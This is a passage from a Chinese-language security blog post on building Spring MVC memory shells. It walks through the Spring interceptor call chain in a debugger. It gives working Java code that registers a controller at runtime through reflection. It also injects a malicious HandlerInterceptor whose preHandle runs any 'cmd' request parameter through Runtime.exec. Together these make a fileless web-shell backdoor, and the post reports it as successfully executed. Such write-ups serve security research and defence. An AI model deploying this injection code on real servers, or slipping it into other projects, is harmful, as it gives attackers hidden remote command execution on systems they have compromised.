class="type">RequestMappingHandlerMapping</span> <span class="variable">mapping</span> <span class="operator">=</span> context.getBean(RequestMappingHandlerMapping.class);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 获取父类的 MappingRegistry 属性</span></span><br><span class="line">        <span class="type">Field</span> <span class="variable">f</span> <span class="operator">=</span> mapping.getClass().getSuperclass().getSuperclass().getDeclaredField(<span class="string">&quot;mappingRegistry&quot;</span>);</span><br><span class="line">        f.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">mappingRegistry</span> <span class="operator">=</span> f.get(mapping);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 反射调用 MappingRegistry 的 register 方法</span></span><br><span class="line">        Class&lt;?&gt; c = Class.forName(<span class="string">&quot;org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry&quot;</span>);</span><br><span class="line"></span><br><span class="line">        Method[] ms = c.getDeclaredMethods();</span><br><span class="line"></span><br><span class="line">        <span class="type">Field</span> <span class="variable">configField</span> <span class="operator">=</span> mapping.getClass().getDeclaredField(<span class="string">&quot;config&quot;</span>);</span><br><span class="line">        configField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        RequestMappingInfo.<span class="type">BuilderConfiguration</span> <span class="variable">config</span> <span class="operator">=</span> (RequestMappingInfo.BuilderConfiguration) configField.get(mapping);</span><br><span class="line">        <span class="type">RequestMappingInfo</span> <span class="variable">info</span> <span class="operator">=</span> RequestMappingInfo.paths(<span class="string">&quot;/bash&quot;</span>).options(config).build();</span><br><span class="line">        <span class="type">PatternsRequestCondition</span> <span class="variable">url</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PatternsRequestCondition</span>(controllerPath);</span><br><span class="line">        <span class="type">RequestMethodsRequestCondition</span> <span class="variable">condition</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">RequestMethodsRequestCondition</span>();</span><br><span class="line">        <span class="type">RequestMappingInfo</span> <span class="variable">info1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">RequestMappingInfo</span>(url, condition, <span class="literal">null</span>, <span class="literal">null</span>, <span class="literal">null</span>, <span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line">        Class&lt;?&gt; myClass = <span class="built_in">this</span>.getclass();</span><br><span class="line">        <span class="keyword">for</span> (Method method : ms) &#123;</span><br><span class="line">            <span class="keyword">if</span> (<span class="string">&quot;register&quot;</span>.equals(method.getName())) &#123;</span><br><span class="line">                method.setAccessible(<span class="literal">true</span>);</span><br><span class="line">                method.invoke(mappingRegistry, info, myClass.newInstance(), myClass.getMethods()[<span class="number">0</span>]);</span><br><span class="line">                response.getWriter().println(<span class="string">&quot;spring controller add&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>结果展示，直接执行成功</p>
<p><img src="/images/spring37.png" width="100%" height="80%"></p>
<p><img src="/images/spring38.png" width="100%" height="80%"></p>
<h3 id="Interceptor型"><a href="#Interceptor型" class="headerlink" title="Interceptor型"></a><strong>Interceptor</strong>型</h3><p>这里的Interceptor是Spring MVC 的拦截器，它的作用和tomcat基于servlet的Filter作用很像，但是在Spring MVC是针对Controller，这个Interceptor就是对应Controller的拦截器</p>
<p>下面就可以看看是如何实现一个简单的Interceptor例子</p>
<h4 id="Interceptor实例创建"><a href="#Interceptor实例创建" class="headerlink" title="Interceptor实例创建"></a>Interceptor实例创建</h4><p>对于创建Interceptor的方法一般有两个</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">通过实现 HandlerInterceptor 接口或继承 HandlerInterceptor 接口的实现类（例如 HandlerInterceptorAdapter）来定义</span><br><span class="line">通过实现 WebRequestInterceptor 接口或继承 WebRequestInterceptor 接口的实现类来定义</span><br></pre></td></tr></table></figure>
<p>这里是通过实现HandlerInterceptor接口来创建</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.springframework.web.servlet.HandlerInterceptor;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.servlet.ModelAndView;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletResponse;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">LoggingInterceptor</span> <span class="keyword">implements</span> <span class="title class_">HandlerInterceptor</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 在请求处理之前进行调用（Controller方法调用之前）</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="type">boolean</span> <span class="title function_">preHandle</span><span class="params">(HttpServletRequest request, HttpServletResponse response, Object handler)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;LoggingInterceptor - preHandle: 请求开始&quot;</span>);</span><br><span class="line">        System.out.println(<span class="string">&quot;请求路径: &quot;</span> + request.getRequestURI());</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>; <span class="comment">// 如果返回false，请求将被中断</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 请求处理之后进行调用，但在视图被渲染之前（Controller方法调用之后）</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">postHandle</span><span class="params">(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;LoggingInterceptor - postHandle: 请求处理完成&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * 在整个请求结束之后被调用，也就是在DispatcherServlet渲染了对应的视图之后执行（主要用于进行资源清理工作）</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">afterCompletion</span><span class="params">(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;LoggingInterceptor - afterCompletion: 请求结束&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>下面通过创建一个WebMvcConfigurer接口的实现类配置Interceptor拦截路径，这里拦截所有的路由</p>
<figure class="highlight typescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Configuration</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">InterceptorMapping_tset1</span> <span class="keyword">implements</span> <span class="title class_">WebMvcConfigurer</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Autowired</span></span><br><span class="line">    <span class="keyword">private</span> <span class="title class_">Interceptor</span>_test1 loggingInterceptor;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="built_in">void</span> <span class="title function_">addInterceptors</span>(<span class="params">InterceptorRegistry registry</span>) &#123;</span><br><span class="line">        <span class="comment">// 注册拦截器，并指定拦截路径</span></span><br><span class="line">        registry.<span class="title function_">addInterceptor</span>(loggingInterceptor)</span><br><span class="line">                .<span class="title function_">addPathPatterns</span>(<span class="string">&quot;/**&quot;</span>) <span class="comment">// 拦截所有请求</span></span><br><span class="line">                .<span class="title function_">excludePathPatterns</span>(<span class="string">&quot;/static/**&quot;</span>, <span class="string">&quot;/css/**&quot;</span>, <span class="string">&quot;/js/**&quot;</span>); <span class="comment">// 排除静态资源</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>具体方法调用如下</p>
<p><img src="/images/spring39.png" width="100%" height="80%"></p>
<h4 id="调用流程分析"><a href="#调用流程分析" class="headerlink" title="调用流程分析"></a>调用流程分析</h4><p>将断点下到preHandle方法里面，看触发时的调用流程里面是从哪里获取我们创建的Interceptor类，为后面从哪里写入恶意的Interceptor做准备</p>
<p><img src="/images/spring40.png" width="100%" height="80%"></p>
<p>先看看调用栈，这里可以看到它的调用流程是先通过Filter—&gt;service—&gt;Interceptor—&gt;controller</p>
<p><img src="/images/spring41.png" width="100%" height="80%"></p>
<p>前部分就可以与tomcat的调用流程相关联，主要看看后面在处理Interceptor的流程，这里就从processRequest方法开始往后分析</p>
<p>其实FrameworkServlet#processRequest还不是处理的地方，还需要往后，来到DispatcherServlet#doDispatch方法这里</p>
<p><img src="/images/spring42.png" width="100%" height="80%"></p>
<p>在DispatcherServlet#doDispatch方法中，当mappeHandler在通过getHandler方法后就获取了对应的interceptor属性，而它的前面还是空，所以关键就是在getHandler方法里面</p>
<p><img src="/images/spring43.png" width="100%" height="80%"></p>
<p>下面跟进去看看它里面的处理流程</p>
<p>下面来到了DispatcherServlet#getHandler方法，由于返回的为handler属性，所以需要继续跟进看handler中是如何赋值的</p>
<p><img src="/images/spring44.png" width="100%" height="80%"></p>
<p>下面就到了AbstractHandlerMapping#getHandler方法里面，看到最后方法返回的是一个executionChain</p>
<p><img src="/images/spring45.png" width="100%" height="80%"></p>
<p>所以我们需要关注对于executionChain属性操作的地方，下面就来到了getHandlerExecutionChain方法里面</p>
<p><img src="/images/spring46.png" width="100%" height="80%"></p>
<p>其实getHandlerExecutionChain方法就是最终方法了，它是通过遍历this.adaptedInterceptors属性值，将Interceptor通过addInterceptor方法放到HandlerExecutionChain里面</p>
<p><img src="/images/spring47.png" width="100%" height="80%"></p>
<p>这里可以看看this.adaptedInterceptors属性里面有什么，它里面就已经封装了我们的interceptor，所以我们在注入时就可以从该属性入手</p>
<p><img src="/images/spring48.png" width="100%" height="80%"></p>
<p>我们可以看看是如何将创建好的Interceptor放入adaptedInterceptors属性属性中的</p>
<p>在AbstractHandlerMapping#initInterceptors方法里面，它直接通过调用adaptedInterceptors的add将一个Interceptor放入其中，我们创建恶意的Interceptor也可以通过该方法放入</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">initInterceptors</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">this</span>.interceptors.isEmpty()) &#123;</span><br><span class="line">       <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; <span class="built_in">this</span>.interceptors.size(); i++) &#123;</span><br><span class="line">          <span class="type">Object</span> <span class="variable">interceptor</span> <span class="operator">=</span> <span class="built_in">this</span>.interceptors.get(i);</span><br><span class="line">          <span class="keyword">if</span> (interceptor == <span class="literal">null</span>) &#123;</span><br><span class="line">             <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">IllegalArgumentException</span>(<span class="string">&quot;Entry number &quot;</span> + i + <span class="string">&quot; in interceptors array is null&quot;</span>);</span><br><span class="line">          &#125;</span><br><span class="line">          <span class="built_in">this</span>.adaptedInterceptors.add(adaptInterceptor(interceptor));</span><br><span class="line">       &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>做完这些又回到了DispatcherServlet#doDispatch方法里面,最后通过HandlerExecutionChain#applyPreHandle方法来调用Interceptor的PreHandle方法</p>
<p><img src="/images/spring49.png" width="100%" height="80%"></p>
<p><img src="/images/spring50.png" width="100%" height="80%"></p>
<h4 id="动态注册实现-1"><a href="#动态注册实现-1" class="headerlink" title="动态注册实现"></a>动态注册实现</h4><p>这里还是一样通过获取WebApplicationContext，再通过getBean获取AbstractHandlerMapping类再通过AbstractHandlerMapping获取对应的adaptedInterceptor属性，最后添加恶意的Interceptor</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Controller</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">AddInterceptor</span> &#123;</span><br><span class="line">    <span class="meta">@RequestMapping(&quot;/interceptor&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">aaa</span><span class="params">(HttpServletRequest request, HttpServletResponse response)</span><span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">WebApplicationContext</span> <span class="variable">context</span> <span class="operator">=</span> RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());</span><br><span class="line">        <span class="type">AbstractHandlerMapping</span> <span class="variable">ad</span> <span class="operator">=</span> context.getBean(AbstractHandlerMapping.class);</span><br><span class="line">        Field adaptedInterceptors=AbstractHandlerMapping.class.getDeclaredField(<span class="string">&quot;adaptedInterceptors&quot;</span>);</span><br><span class="line">        adaptedInterceptors.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        ArrayList&lt;Object&gt; adaptedInterceptor = (ArrayList)adaptedInterceptors.get(ad);</span><br><span class="line">        <span class="type">Interceptor_inject1</span> <span class="variable">interceptorInject1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Interceptor_inject1</span>();</span><br><span class="line">        adaptedInterceptor.add(interceptorInject1);</span><br><span class="line"></span><br><span class="line">        response.getWriter().println(<span class="string">&quot;inject Interceptor success&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Interceptor_inject1</span> <span class="keyword">implements</span> <span class="title class_">HandlerInterceptor</span> &#123;</span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> <span class="type">boolean</span> <span class="title function_">preHandle</span><span class="params">(HttpServletRequest request, HttpServletResponse response, Object handler)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">            <span class="keyword">try</span>&#123;</span><br><span class="line">                <span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span>request.getParameter(<span class="string">&quot;cmd&quot;</span>);</span><br><span class="line">                Runtime.getRuntime().exec(cmd);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">catch</span>(Exception e)&#123;</span><br><span class="line">                e.printStackTrace();</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/images/spring51.png" width="100%" height="80%"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/java/" rel="tag"># java</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/02/20/Tomcat%E5%86%85%E5%AD%98%E9%A9%AC/" rel="prev" title="Tomcat内存马">
                  <i class="fa fa-angle-left"></i> Tomcat内存马
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">luokuang</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>




    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
